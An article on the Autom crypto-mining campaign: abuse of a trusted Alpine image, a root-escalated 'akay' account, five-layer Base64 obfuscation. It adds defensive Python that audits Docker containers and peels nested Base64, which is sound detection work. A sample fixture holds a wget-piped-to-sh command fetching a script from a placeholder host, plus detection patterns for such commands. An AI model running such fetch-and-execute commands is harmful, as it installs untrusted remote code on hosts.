
Autom Malware

Autom is the name of an ongoing crypto-mining campaign, first detected in 2019. Since then, a total of 84 attacks against researchers' honeypot servers have been reported, four of them in 2021. These crypto-mining attacks are not expected to slow down in the coming year; rather the opposite. Experts report that the attackers behind the Autom campaign are evolving their methods, making the malware better at evading defense mechanisms and staying under the radar of anti-virus scanning tools.

The initial attacks of this campaign involved executing a malicious command once a user ran a vanilla image with the name "alpine:latest". That action resulted in a shell script named "autom.sh" being downloaded onto the device. This tactic continues to succeed because most organizations trust official vanilla images and allow their use. While the malicious command added to the abused vanilla image has barely changed over time, malware researchers have identified a change in the server from which the shell script is downloaded.

According to reports, the attack sequence still relies on the autom.sh script, which creates a new user account named "akay". The account's privileges are then elevated to root, allowing the attackers to run arbitrary commands on the infected machine and, eventually, exploit its resources to mine cryptocurrency.
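The two steps above (a trusted base image started with a command that fetches and runs a remote shell script, then a new account pushed to root) are what a defender can look for on a Docker host. The following is an added example, not code from the original article or from the researchers who reported Autom. It audits the JSON produced by `docker inspect` (only the real fields `Config.Image`, `Config.Cmd` and `Config.Entrypoint` are used) and flags containers built on a plain base image whose command pipes a download into a shell or fetches a `.sh` file. The sample JSON, container names and the placeholder download host are constructed for the example; the page does not give the real server.

```python
import json
import re

# Constructed sample resembling `docker inspect` output, trimmed to the fields
# used below. The host name is a placeholder; the page does not name the server.
SAMPLE_INSPECT = json.dumps([
    {
        "Id": "aaaa1111",
        "Name": "/pensive_morse",
        "Config": {
            "Image": "alpine:latest",
            "Cmd": ["sh", "-c", "wget -q -O- http://EXAMPLE-PLACEHOLDER/autom.sh | sh"],
            "Entrypoint": None,
        },
    },
    {
        "Id": "bbbb2222",
        "Name": "/web",
        "Config": {
            "Image": "nginx:1.21",
            "Cmd": ["nginx", "-g", "daemon off;"],
            "Entrypoint": ["/docker-entrypoint.sh"],
        },
    },
    {
        "Id": "cccc3333",
        "Name": "/build",
        "Config": {
            "Image": "alpine:latest",
            "Cmd": ["sh", "-c", "apk add --no-cache git && git --version"],
            "Entrypoint": None,
        },
    },
])

# Plain "vanilla" base images that rarely run a download-and-execute command legitimately.
BASE_IMAGES = ("alpine", "ubuntu", "debian", "busybox", "centos")

# curl/wget whose output is piped straight into sh or bash.
DOWNLOAD_TO_SHELL = re.compile(r'\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b')
# curl/wget fetching a shell script, even if it is run in a later step.
SCRIPT_FETCH = re.compile(r'\b(curl|wget)\b[^|;&]*\.sh\b')


def is_base_image(ref: str) -> bool:
    """True when the image reference (registry/repo:tag@digest) names a plain base image."""
    name = ref.split('/')[-1].split(':')[0].split('@')[0]
    return name in BASE_IMAGES


def command_line(cfg: dict) -> str:
    """Join Entrypoint and Cmd into the command the container actually runs."""
    parts = list(cfg.get("Entrypoint") or []) + list(cfg.get("Cmd") or [])
    return " ".join(parts)


def audit_containers(inspect_json: str) -> list:
    """Return a finding per container that matches the download-and-run pattern."""
    findings = []
    for container in json.loads(inspect_json):
        cfg = container.get("Config", {})
        image = cfg.get("Image", "")
        cmd = command_line(cfg)
        reasons = []
        if is_base_image(image):
            if DOWNLOAD_TO_SHELL.search(cmd):
                reasons.append("downloads remote content and pipes it to a shell")
            elif SCRIPT_FETCH.search(cmd):
                reasons.append("fetches a remote shell script")
        if reasons:
            findings.append({
                "id": container.get("Id"),
                "name": container.get("Name"),
                "image": image,
                "cmd": cmd,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in audit_containers(SAMPLE_INSPECT):
        print(f"{f['id']} {f['name']} ({f['image']}): {', '.join(f['reasons'])}")
        print(f"  cmd: {f['cmd']}")
```

On a live host the same function can be fed `docker inspect $(docker ps -aq)`; the image check keeps noise down, since a download-and-execute command in a purpose-built application image is a different, usually legitimate, pattern.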

A recently added feature concerns staying invisible to detection: the malicious scripts can now disable security mechanisms by retrieving an obfuscated mining shell script. That script evades security tools because it is Base64-encoded five times.
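Stacked Base64 defeats scanners that only decode one layer. As an added example, not code from the article or from the Autom researchers, the block below peels nested Base64 until the content is no longer valid Base64 text, reports how many layers were removed, and checks the innermost payload for the behaviour the page describes (account creation, the "akay" account name, root escalation, remote downloads). The five-layer sample is constructed from a harmless stand-in script; the layer threshold and indicator patterns are the example's own assumptions.

```python
import base64
import binascii
import re

# Constructed sample: a harmless stand-in script wrapped in five Base64 layers,
# imitating the layering described for Autom (not the campaign's own script).
INNER_SCRIPT = "#!/bin/sh\nuseradd -m akay\necho 'miner placeholder'\n"


def wrap_base64(text: str, layers: int) -> str:
    """Apply Base64 encoding `layers` times (used only to build the sample)."""
    data = text.encode()
    for _ in range(layers):
        data = base64.b64encode(data)
    return data.decode()


SAMPLE = wrap_base64(INNER_SCRIPT, 5)

_B64_ALPHABET = re.compile(r'^[A-Za-z0-9+/]+={0,2}$')


def _looks_like_text(raw: bytes):
    """Return the decoded text if `raw` is printable UTF-8, else None."""
    try:
        text = raw.decode('utf-8')
    except UnicodeDecodeError:
        return None
    if all(ch.isprintable() or ch in '\r\n\t' for ch in text):
        return text
    return None


def peel_base64(blob: str, max_layers: int = 20):
    """Strip nested Base64 layers. Returns (layers_removed, innermost_text).

    Stops when the current content is not well-formed Base64 or does not
    decode to printable text, so the innermost script is returned intact.
    """
    current = blob.strip()
    depth = 0
    while depth < max_layers:
        compact = ''.join(current.split())  # tolerate wrapped lines
        if len(compact) < 8 or len(compact) % 4 or not _B64_ALPHABET.match(compact):
            break
        try:
            raw = base64.b64decode(compact, validate=True)
        except (binascii.Error, ValueError):
            break
        text = _looks_like_text(raw)
        if text is None:
            break
        current = text.strip()
        depth += 1
    return depth, current


# Indicator patterns are the example's own choices, drawn from the behaviour
# the article describes; "akay" is the account name the article reports.
INDICATORS = {
    'new_user': re.compile(r'\b(useradd|adduser)\b'),
    'root_escalation': re.compile(r'(/etc/sudoers|\bsudo\b|uid=0)'),
    'remote_download': re.compile(r'\b(curl|wget)\b'),
    'known_account': re.compile(r'\bakay\b'),
}


def analyze(blob: str, min_suspicious_depth: int = 3) -> dict:
    """Peel the blob and flag it on encoding depth alone or on payload indicators."""
    depth, payload = peel_base64(blob)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(payload))
    return {
        'depth': depth,
        'indicators': hits,
        'suspicious': depth >= min_suspicious_depth or bool(hits),
        'payload': payload,
    }


if __name__ == '__main__':
    result = analyze(SAMPLE)
    print(f"layers peeled: {result['depth']}, indicators: {result['indicators']}")
    print(result['payload'])
```

The depth threshold matters on its own: legitimate scripts are almost never Base64-wrapped more than once, so three or more layers is worth an alert even before the payload is read.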

Along with the already known vulnerabilities that cybercriminals usually exploit for crypto-mining attacks, security flaws in the Log4j logging library have in recent weeks been abused for crypto-jacking, a scheme that likewise hijacks machines to mine cryptocurrency. Newly discovered vulnerabilities in Atlassian Confluence, F5 BIG-IP, Oracle WebLogic Server, and VMware vCenter have also been misused. At the same time, the network-attached storage (NAS) appliance maker QNAP recently announced the discovery of cryptocurrency-mining malware that could occupy around 50% of total CPU usage.
